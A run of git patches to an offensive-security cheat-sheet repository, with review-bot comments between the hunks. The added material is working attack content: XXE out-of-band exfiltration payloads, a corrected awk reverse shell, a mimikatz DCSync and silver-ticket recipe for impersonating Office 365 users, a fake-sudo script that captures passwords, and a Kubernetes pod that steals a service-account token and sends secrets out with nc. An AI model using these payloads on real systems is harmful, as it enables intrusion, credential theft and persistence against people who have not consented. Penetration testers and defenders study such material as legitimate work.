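Review bot: several structure inconsistencies in the new Zip Slip README: the Summary mixes `-` and `*` bullets (`- [Detection]`, `* [Exploits]`), `### Additional Notes` is listed in the Summary as a sibling of the `##` sections but written one level deeper, and the evilarc invocation is fenced as ```` ```python ```` although it is a shell command line (the other READMEs in the repo use ```` ```powershell ```` or ```` ```bash ```` for these). The opening blockquote is unattributed; since the References already cite Snyk's write-up, append the source after the quote the way the HQL page does with `- Wikipedia`. The `-p var/www/html/` value is an example prefix and should be described as such next to the command so readers know to adapt it.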
@@ -364,7 +364,9 @@ Assuming payloads such as the previous return a verbose error. You can start poi ``` -``` +**Classic** + +```xml ]> @@ -372,6 +374,38 @@ Assuming payloads such as the previous return a verbose error. You can start poi ``` +**OOB via SVG rasterization** + +*xxe.svg* + +```xml + + +%sp; +%param1; +]> + + XXE via SVG rasterization + + + + + + + &exfil; + + + +``` + +*xxe.xml* + +```xml + +"> +``` + ### XXE inside SOAP ```xml @@ -479,3 +513,4 @@ updating: xl/sharedStrings.xml (deflated 17%) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) +- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) From 775d10c256fb47b8494d90a1eef466b7a9c3e740 Mon Sep 17 00:00:00 2001 From: Dave <47663767+cydave@users.noreply.github.com> Date: Sun, 3 Nov 2019 16:07:16 +0000 Subject: [PATCH 108/222] Fix awk snippet A small typo in the awk one-liner prevents successful execution of the command. ``` awk: cmd. line:1: warning: remote host and port information (10.0.0.1>, 4242) invalid: Name or service not known awk: cmd. line:1: fatal: can't open two way pipe `/inet/tcp/0/10.0.0.1>/4242' for input/output (No such file or directory) ``` This commit fixes this :) --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 60cd02a9..5a4b3178 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md 
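Review bot: the two new subsections in the XXE hunk are marked with bold text (`**Classic**`, `**OOB via SVG rasterization**`) instead of headings, while the section immediately after them is `### XXE inside SOAP`; use `###`/`####` headings so they get anchors and can be listed in the file's summary. The italic filenames `*xxe.svg*` and `*xxe.xml*` are fine, but one sentence should state that `xxe.xml` is the external DTD the SVG's parameter entity pulls in, since as written the reader has to infer the relationship between the two blocks. The reference added at the bottom keeps the existing `- [title](url)` style, good.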
@@ -173,7 +173,7 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse ### Awk ```powershell -awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null ``` ### Java From 64f8f4d869e0fc510534b677af35bbfcbfb86aa0 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sun, 3 Nov 2019 23:49:36 +0100 Subject: [PATCH 109/222] add ref for docker SSRF --- Server Side Request Forgery/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index b9c47aca..5b597361 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -628,6 +628,11 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json ``` +More info: + +- Daemon socket option: https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option +- Docker Engine API: https://docs.docker.com/engine/api/latest/ + ### SSRF URL for Rancher ```powershell From 54c94e03982f15dba933fd89653bf1c87e62410b Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sun, 3 Nov 2019 23:50:58 +0100 Subject: [PATCH 110/222] add ref for docker SSRF --- Server Side Request Forgery/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index b9c47aca..5b597361 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md 
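Review bot: the fix is correct (the stray `>` in `/inet/tcp/0/10.0.0.1>/4242` made gawk treat `10.0.0.1>` as the host name, which is exactly the error quoted in the commit message), but the block is still fenced as ```powershell although it is a gawk one-liner run from a POSIX shell; retag it ```bash. It would also help to state that the `/inet/tcp/...` special file and the `|&` coprocess operator are gawk extensions, so the snippet does not run under mawk or other awk implementations.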
@@ -628,6 +628,11 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json ``` +More info: + +- Daemon socket option: https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option +- Docker Engine API: https://docs.docker.com/engine/api/latest/ + ### SSRF URL for Rancher ```powershell From e3604c01d7005ac7c4040bb84432e9c883c1b535 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Mon, 4 Nov 2019 01:58:15 +0100 Subject: [PATCH 111/222] XXE: tools description + more tools --- XXE Injection/README.md | 78 +++++++++++++++++++++++++---------------- 1 file changed, 47 insertions(+), 31 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index d4792dd6..4b754bde 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md 
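Review bot: PATCH 110/222 is the same change as PATCH 109/222 (same file, same `index b9c47aca..5b597361`, same `More info:` hunk adding the dockerd socket and Engine API links), so the second commit either fails to apply or is a rebase leftover; drop it or squash the two. On the hunk itself the two links are a good addition, and a sentence noting that access to `docker.sock`, whether from inside a container or via an SSRF-reachable TCP endpoint, is equivalent to root on the host would tell the reader why those docs matter and what to lock down.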
@@ -34,39 +34,55 @@ Syntax: `` ## Tools -- [xxeftp](https://github.com/staaldraad/xxeserv) +- [xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads ``` - sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555 + sudo ./xxeftp -uno 443 + ./xxeftp -w -wps 5555 + ``` +- [230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/) + ``` + $ python3 230.py 2121 + ``` +- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods + ```bash + # Enumerating /etc directory in HTTPS application: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl + # Enumerating /etc directory using gopher for OOB method: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher + # Second order exploitation: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt + # Bruteforcing files using HTTP out of band method and netdoc protocol: + ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc + # Enumerating using direct exploitation: + ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK + # Enumerating unfiltered ports: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all + # Stealing Windows hashes: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes + # Uploading files using Java jar: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf + # Executing system commands using PHP expect: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls + # Testing for XSLT injection: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt + # Log requests only: + ruby 
XXEinjector.rb --logger --oob=http --output=/tmp/out.txt + ``` +- [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF) + ``` + ruby server.rb + ``` +- [docem](https://github.com/whitel1st/docem) - Uility to embed XXE and XSS payloads in docx,odt,pptx,etc + ``` + ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx + ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place + ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place + ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx + ``` +- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities. + ``` + python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs ``` - - [230-OOB](https://github.com/lc/230-OOB) and payload generation via [http://xxe.sh/](http://xxe.sh/) - ``` - $ python3 230.py 2121 - ``` - - [XXEinjector](https://github.com/enjoiz/XXEinjector) - ```bash - # Enumerating /etc directory in HTTPS application: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl - # Enumerating /etc directory using gopher for OOB method: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher - # Second order exploitation: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt - # Bruteforcing files using HTTP out of band method and netdoc protocol: - ruby XXEinjector.rb --host=192.168.0.2 
--brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc - # Enumerating using direct exploitation: - ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK - # Enumerating unfiltered ports: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all - # Stealing Windows hashes: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes - # Uploading files using Java jar: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf - # Executing system commands using PHP expect: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls - # Testing for XSLT injection: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt - # Log requests only: - ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt - ``` ## Detect the vulnerability From 60050219b7b470de16e7d7dc4145f99ab054aece Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 4 Nov 2019 21:43:44 +0100 Subject: [PATCH 112/222] Impersonating Office 365 Users on Azure AD Connect --- .../Active Directory Attack.md | 64 +++++++++++++++++-- .../Linux - Persistence.md | 20 ++++++ .../Network Pivoting Techniques.md | 1 + 3 files changed, 81 insertions(+), 4 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 51d7003a..f14954e3 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
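Review bot: the third docem invocation passes `-pm` twice (`-pm xss ... -pm per_place`) where every other invocation uses `-pt` for the per_place/per_document/per_file value, so the second one should be `-pt per_place`. Fix the typo `Uility` to `Utility` in the docem description, and tag the fences consistently: only the XXEinjector block is ```bash while the xxeftp, 230-OOB, oxml_xxe, docem and otori blocks are untagged, and the 230-OOB line keeps a `$ ` prompt that the others drop. Since the hunk moves the 230-OOB and XXEinjector entries rather than changing them, a short "moved, unchanged" remark in the commit message would make the large diff easier to review.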
@@ -17,7 +17,7 @@ * [Password in AD User comment](#password-in-ad-user-comment) * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) - * [Kerberoast](#kerberoast) + * [Kerberoasting](#kerberoasting) * [KRB_AS_REP roasting](#krb_as_rep-roasting) * [Pass-the-Hash](#pass-the-hash) * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) @@ -34,6 +34,7 @@ * [Password spraying](#password-spraying) * [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab) * [PXE Boot image attack](#pxe-boot-image-attack) + * [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect) ## Tools @@ -123,6 +124,13 @@ Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] ``` +* [AutomatedLab](https://github.com/AutomatedLab/AutomatedLab) + ```powershell + New-LabDefinition -Name GettingStarted -DefaultVirtualizationEngine HyperV + Add-LabMachineDefinition -Name FirstServer -OperatingSystem 'Windows Server 2016 SERVERSTANDARD' + Install-Lab + Show-LabDeploymentSummary + ``` ## Most common paths to AD compromise @@ -229,6 +237,7 @@ ls # list files Download a folder recursively ```powershell +smbclient -U username //10.0.0.1/SYSVOL smbclient //10.0.0.1/Share smb: \> mask "" smb: \> recurse ON 
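Review bot: the `* [AutomatedLab](https://github.com/AutomatedLab/AutomatedLab)` entry under `## Tools` gives only the four PowerShell lines and no description. AutomatedLab provisions lab VMs rather than attacking anything, so one line saying it is listed for building a practice domain (which is what the "How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V" reference added later in this patch covers) would stop readers expecting an attack tool.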
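Review bot: in the "Download a folder recursively" block, the new `smbclient -U username //10.0.0.1/SYSVOL` line is inserted directly above `smbclient //10.0.0.1/Share`, so the block now opens with two separate connection commands followed by a single interactive session (`smb: \> mask ""`, `smb: \> recurse ON`, ...), which reads as if both connections are needed. Either move the SYSVOL example into its own fence with a comment such as `# authenticate explicitly`, or fold the `-U username` option into the existing line.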
@@ -505,11 +514,11 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` -### Kerberoast +### Kerberoasting > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) -Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. +Any valid domain user can request a kerberos ticket (TGS) for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. ```powershell $ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request @@ -536,6 +545,10 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt ./john ~/hash.txt --wordlist=rockyou.lst ``` +Mitigations: +* Have a very long password for your accounts with SPNs +* Make sure no users have SPNs + ### KRB_AS_REP Roasting If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting @@ -830,6 +843,12 @@ Extract the base64 TGT from Rubeus output and load it to our current session. Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HACKER\krbtgt` + +#### Mitigation + +* Ensure sensitive accounts cannot be delegated +* Disable the Print Spooler Service + ### Resource-Based Constrained Delegation Resource-based Constrained Delegation was introduced in Windows Server 2012. 
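Review bot: the two mitigation blocks added in this patch use different formats: the Kerberoasting one is a bare `Mitigations:` line followed by `*` bullets, while the delegation one gets a `#### Mitigation` heading. Use the heading form for both so they show up in the table of contents. "Make sure no users have SPNs" is also more absolute than the practical advice: keep SPNs off ordinary user accounts and use group Managed Service Accounts (long, automatically rotated passwords) for services, and alert on TGS requests with RC4 encryption (Event ID 4769, ticket encryption type 0x17), which is the detection that matches this section.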
@@ -1073,8 +1092,44 @@ PXE allows a workstation to boot from the network by retrieving an operating sys ``` +### Impersonating Office 365 Users on Azure AD Connect + +Prerequisites: + +* Obtain NTLM password hash of the AZUREADSSOACC account + ```powershell + mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit + ``` + +* AAD logon name of the user we want to impersonate (userPrincipalName or mail) + ```powershell + elrond@contoso.com + ``` + +* SID of the user we want to impersonate + ```powershell + S-1-5-21-2121516926-2695913149-3163778339-1234 + ``` + + +Create the Silver Ticket and inject it into Kerberos cache: +```powershell +mimikatz.exe "kerberos::golden /user:elrond +/sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 +/domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd +/target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit +``` + +Launch Mozilla Firefox, go to about:config +```powershell +network.negotiate-auth.trusted-uris="https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com". +``` + +Navigate to any web application that is integrated with our AAD domain. Once at the Office365 logon screen, fill in the user name, while leaving the password field empty. Then press TAB or ENTER. + ## References +* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) * [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence) 
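Review bot: the new reference link is broken: `(#https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)` has a leading `#`, which makes it an in-page anchor instead of an external URL; remove the `#`. In the section body, the mimikatz command is split across three lines inside its quoted argument, which does not run as one command from cmd.exe, so put it on a single line; the about:config value carries a trailing `.` inside the fence (`...autologon.microsoftazuread-sso.com".`) that would be copied along with it; and the logon name and SID examples are plain values, not PowerShell, so they do not need ```powershell fences. A `#### Mitigation` block matching the ones added earlier in this patch would fit here as well: the `AZUREADSSOACC$` account whose hash the prerequisites start from should be treated as a Tier 0 asset, and Microsoft recommends rolling over its Kerberos decryption key on a regular schedule.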
@@ -1129,4 +1184,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) * [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) * [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) -* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) \ No newline at end of file +* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) +* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index 567987bc..f84fc8e5 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -67,6 +67,26 @@ fi rm /tmp/$TMPNAME2 ``` +or add the following line inside its .bashrc file. + +```powershell +$ chmod u+x ~/.hidden/fakesudo +$ echo "alias sudo=~/.hidden/fakesudo" >> ~./bashrc +``` + +and create the `fakesudo` script. + +```powershell +read -sp "[sudo] password for $USER: " sudopass +echo "" +sleep 2 +echo "Sorry, try again." +echo $sudopass >> /tmp/pass.txt + +/usr/bin/sudo $@ +``` + + ## Backdooring a startup service ```bash diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 90a60c0e..94d0b59a 100644 
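Review bot: the redirect in `echo "alias sudo=~/.hidden/fakesudo" >> ~./bashrc` targets `~./bashrc` rather than `~/.bashrc`, so as written nothing is appended to the user's profile; the intro also says "the following line" while the block contains two commands (`chmod` and `echo`). Both fences are tagged ```powershell although the content is a bash session and a bash script; retag them ```bash. From the defender's side this is the alias hijack that `type sudo` or `alias sudo` exposes in a session and that a stray `/tmp/pass.txt` betrays, which is worth a sentence next to the technique.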
--- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -266,3 +266,4 @@ unzip ngrok-stable-linux-amd64.zip * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) +* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) \ No newline at end of file From 24516ca7a1b6651ceaabf56cb0ba985fb2592128 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 5 Nov 2019 11:05:59 +0100 Subject: [PATCH 113/222] Kubernetes attacks update + ref to securityboulevard --- Kubernetes/readme.md | 190 ++++++++++++++---- .../Active Directory Attack.md | 4 + 2 files changed, 160 insertions(+), 34 deletions(-) diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index 7971af27..841e3d96 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md 
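Review bot: `Oct 28,2019` is missing a space after the comma, and the new line is again added without a trailing newline (`\ No newline at end of file` persists in this hunk, in the Active Directory references hunk and in the Kubernetes file); end each file with a newline so the next reference added does not produce a spurious one-line diff.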
@@ -1,42 +1,164 @@ +# Kubernetes + > Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. -### API addresses that you should know *(External network visibility)* ---- -#### - cAdvisor -``` -curl -k https://:4194 -``` -#### - Insecure API server -``` -curl -k https://:8080 -``` -#### - Secure API Server -``` -curl -k https://:(8|6)443/swaggerapi -curl -k https://:(8|6)443/healthz -curl -k https://:(8|6)443/api/v1 -``` -#### - etcd API -``` -curl -k https://:2379 -curl -k https://:2379/version -``` -#### - Kubelet API -``` -curl -k https://:10250 -curl -k https://:10250/metrics -curl -k https://:10250/pods -``` -#### - kubelet (Read only) -``` -curl -k https://:10255 -``` ----- -### Tools for detecting misconfigurations in Kubernetes: ---- +## Summary + +- [Tools](#tools) +- [RBAC Configuration](#rbac-configuration) + - [Listing Secrets](#listing-secrets) + - [Access Any Resource or Verb](#access-any-resource-or-verb) + - [Pod Creation](#pod-creation) + - [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec) + - [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings) + - [Impersonating a Privileged Account](#impersonating-a-privileged-account) +- [API addresses that you should know](#api-adresses-that-you-should-know) +- [References](#references) + +## Tools * [kubeaudit](https://github.com/Shopify/kubeaudit). kubeaudit is a command line tool to audit Kubernetes clusters for various different security concerns: run the container as a non-root user, use a read only root filesystem, drop scary capabilities, don't add new ones, don't run privileged, ... * [kubesec.io](https://kubesec.io/). Security risk analysis for Kubernetes resources. * [kube-bench](https://github.com/aquasecurity/kube-bench). 
kube-bench is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/). * [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios. + +## RBAC Configuration + +### Listing Secrets + +An attacker that gains access to list secrets in the cluster can use the following curl commands to get all secrets in "kube-system" namespace. + +```powershell +curl -v -H "Authorization: Bearer " https://:/api/v1/namespaces/kube-system/secrets/ +``` + +### Access Any Resource or Verb + +```powershell +resources: +- '*' +verbs: +- '*' +``` + +### Pod Creation + +Check your right with `kubectl get role system:controller:bootstrap-signer -n kube-system -o yaml`. +Then create a malicious pod.yaml file. + +```yaml +apiVersion: v1 +kind: Pod +metadata: + name: alpine + namespace: kube-system +spec: + containers: + - name: alpine + image: alpine + command: ["/bin/sh"] + args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000'] + serviceAccountName: bootstrap-signer + automountServiceAccountToken: true + hostNetwork: true +``` + +Then `kubectl apply -f malicious-pod.yaml` + +### Privilege to Use Pods/Exec + +```powershell +kubectl exec -it -n –- sh +``` + +### Privilege to Get/Patch Rolebindings + +The purpose of this JSON file is to bind the admin "CluserRole" to the compromised service account. +Create a malicious RoleBinging.json file. 
+ +```powershell +{ + "apiVersion": "rbac.authorization.k8s.io/v1", + "kind": "RoleBinding", + "metadata": { + "name": "malicious-rolebinding", + "namespcaes": "default" + }, + "roleRef": { + "apiGroup": "*", + "kind": "ClusterRole", + "name": "admin" + }, + "subjects": [ + { + "kind": "ServiceAccount", + "name": "sa-comp" + "namespace": "default" + } + ] +} +``` + +```powershell +curl -k -v -X POST -H "Authorization: Bearer " -H "Content-Type: application/json" https://:/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings -d @malicious-RoleBinging.json +curl -k -v -X POST -H "Authorization: Bearer " -H "Content-Type: application/json" https://:/api/v1/namespaces/kube-system/secret +``` + +### Impersonating a Privileged Account + +```powershell +curl -k -v -XGET -H "Authorization: Bearer " -H "Impersonate-Group: system:masters" -H "Impersonate-User: null" -H "Accept: application/json" https://:/api/v1/namespaces/kube-system/secrets/ +``` + + +## API addresses that you should know + +*(External network visibility)* + +### cAdvisor + +```powershell +curl -k https://:4194 +``` + +### Insecure API server + +```powershell +curl -k https://:8080 +``` + +### Secure API Server + +```powershell +curl -k https://:(8|6)443/swaggerapi +curl -k https://:(8|6)443/healthz +curl -k https://:(8|6)443/api/v1 +``` + +### etcd API + +```powershell +curl -k https://:2379 +curl -k https://:2379/version +``` + +### Kubelet API + +```powershell +curl -k https://:10250 +curl -k https://:10250/metrics +curl -k https://:10250/pods +``` + +### kubelet (Read only) + +```powershell +curl -k https://:10255 +``` + + +## References + +- [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1) +- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2) \ No newline at end of file 
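Review bot: the Summary link `[API addresses that you should know](#api-adresses-that-you-should-know)` misspells the slug (`adresses`), so it will not jump to the heading; use `#api-addresses-that-you-should-know`. The RoleBinding JSON is not valid: `"namespcaes"` should be `"namespace"` and a comma is missing after `"name": "sa-comp"`; the prose also writes `CluserRole` and `RoleBinging`, and the file is then referenced as `@malicious-RoleBinging.json`. The pod example is introduced as `pod.yaml` but applied as `malicious-pod.yaml`, and it hard-codes `192.168.154.228:8443` where the curl examples use placeholders. Fence tags: the RBAC rule fragment and the RoleBinding are YAML and JSON and the curl lines are shell, yet everything is tagged ```powershell. "Check your right" should be "Check your rights", and `kubectl auth can-i --list` is the direct way to see what the current service account is allowed to do, so it belongs in that sentence. Each subsection describes a permission a defender should audit (listing secrets, creating pods in kube-system, patching rolebindings, impersonation), so a closing line pointing back to the Tools section for RBAC review would tie the file together.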
